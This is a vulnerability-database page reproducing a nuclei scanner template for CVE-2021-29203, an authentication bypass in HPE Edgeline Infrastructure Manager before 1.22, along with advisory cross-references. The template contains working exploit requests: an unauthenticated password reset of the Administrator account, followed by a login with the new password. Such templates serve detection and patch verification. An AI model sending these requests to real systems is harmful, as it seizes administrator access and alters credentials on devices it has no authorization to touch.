Lucene search
K

HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 61 Views

HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass vulnerability

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-29203
26 Jan 202500:00
circl
CNNVD
HP Edgeline Infrastructure Management 访问控制错误漏洞
4 May 202100:00
cnnvd
CNVD
HPE Edgeline Infrastructure Manager Authorization Issues Vulnerability
7 May 202100:00
cnvd
Check Point Advisories
HPE Edgeline Infrastructure Manager Authentication Bypass (CVE-2021-29203)
31 May 202100:00
checkpoint_advisories
CVE
CVE-2021-29203
6 May 202120:17
cve
Cvelist
CVE-2021-29203
6 May 202120:17
cvelist
Tenable Nessus
HPE Edgeline Infrastructure Manager Authentication Bypass (HPESBGN04124)
4 Jun 202100:00
nessus
NVD
CVE-2021-29203
6 May 202121:15
nvd
OSV
CVE-2021-29203
6 May 202121:15
osv
Prion
Authentication flaw
6 May 202121:15
prion
Rows per page
id: CVE-2021-29203

info:
  name: HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass
  author: madrobot
  severity: critical
  description: HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration.
  impact: |
    Successful exploitation of this vulnerability could result in unauthorized access to sensitive information, unauthorized configuration changes, or disruption of the affected system.
  remediation: |
    Upgrade to HPE Edgeline Infrastructure Manager version 1.22 or later to mitigate this vulnerability.
  reference:
    - https://www.tenable.com/security/research/tra-2021-15
    - https://nvd.nist.gov/vuln/detail/CVE-2021-29203
    - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn04124en_us
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-29203
    cwe-id: CWE-306
    epss-score: 0.68293
    epss-percentile: 0.99244
    cpe: cpe:2.3:a:hp:edgeline_infrastructure_manager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: hp
    product: edgeline_infrastructure_manager
  tags: cve2021,cve,hpe,bypass,tenable,hp,vkev,vuln

http:
  - raw:
      - |
        PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/json

        {"Password":"{{randstr}}"}
      - |
        POST /redfish/v1/SessionService/Sessions/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"UserName":"Administrator","Password":"{{randstr}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "X-Auth-Token"
          - "PasswordReset"
          - "Location"
        condition: and

      - type: word
        part: body
        words:
          - "Base.1.0.Created"

      - type: status
        status:
          - 201
# digest: 490a0046304402200c8987688853f5b053ac74ae9f5b9c73d58d49e96e26f54d9bded8f104fb201802201cd6af7d717d039f9626bfc76d3a7330b3d17b1004b37c5ed0a3a5a005e65ba8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.19.8
CVSS 210
EPSS0.68293
61